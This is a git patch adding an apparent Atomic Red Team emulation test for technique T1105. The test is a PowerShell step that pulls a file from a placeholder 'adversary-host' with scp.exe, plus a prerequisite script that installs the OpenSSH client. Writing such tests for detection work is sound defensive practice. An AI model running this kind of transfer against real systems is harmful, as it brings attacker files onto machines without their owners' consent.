From 35b0abe836ea8576324e8b1c880270f01df7e12b Mon Sep 17 00:00:00 2001
From: Burak Karaduman <36070747+krdmnbrk@users.noreply.github.com>
Date: Tue, 19 Nov 2024 21:03:15 +0300
Subject: [PATCH] T1105 - Windows pull file using scp.exe (#2985)

* T1105 - Windows pull file using scp.exe

* Update T1105.yaml

---------

Co-authored-by: Hare Sudhan <code@0x6c.dev>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1105/T1105.yaml | 51 ++++++++++++++++++++++++++++++++++++++++
 1 file changed, 51 insertions(+)

diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
index 3653524817..3305f8e2eb 100644
--- a/atomics/T1105/T1105.yaml
+++ b/atomics/T1105/T1105.yaml
@@ -1048,3 +1048,54 @@ atomic_tests:
       $filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}"
       Remove-Item -Path $filePath -Force -erroraction silentlycontinue
       Write-Output "File deleted: $filePath"
+- name: Windows pull file using scp.exe
+  description: |
+    This test simulates pulling files using SCP on a Windows environment.
+  supported_platforms:
+    - windows
+  input_arguments:
+    remote_path:
+      description: Path of folder to pull
+      type: path
+      default: /tmp/T1105.txt
+    remote_host:
+      description: Remote host to pull from 
+      type: string
+      default: adversary-host
+    local_path:
+      description: Local path to receive files
+      type: path
+      default: C:\temp
+    username:
+      description: User account to authenticate on remote host
+      type: string
+      default: adversary
+  dependency_executor_name: powershell
+  dependencies:
+    - description: |
+        This test requires the `scp` command to be available on the system.
+      prereq_command: |
+        if (Get-Command scp -ErrorAction SilentlyContinue) {
+            Write-Output "SCP command is available."
+            exit 0
+        } else {
+            Write-Output "SCP command is not available."
+            exit 1
+        }
+
+      get_prereq_command: |
+        # Define the capability name for OpenSSH Client
+        $capabilityName = "OpenSSH.Client~~~~0.0.1.0"
+        try {
+            # Install the OpenSSH Client capability
+            Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
+            Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
+        } catch {
+            # Handle any errors that occur during the installation process
+            Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
+        }
+  executor:
+    elevation_required: true
+    name: powershell
+    command: |
+      scp.exe #{username}@#{remote_host}:#{remote_path} #{local_path}